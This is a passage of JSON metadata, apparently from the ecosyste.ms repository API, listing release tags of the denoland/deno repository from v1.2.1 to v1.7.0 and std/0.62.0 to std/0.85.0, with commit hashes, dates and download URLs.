and/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosy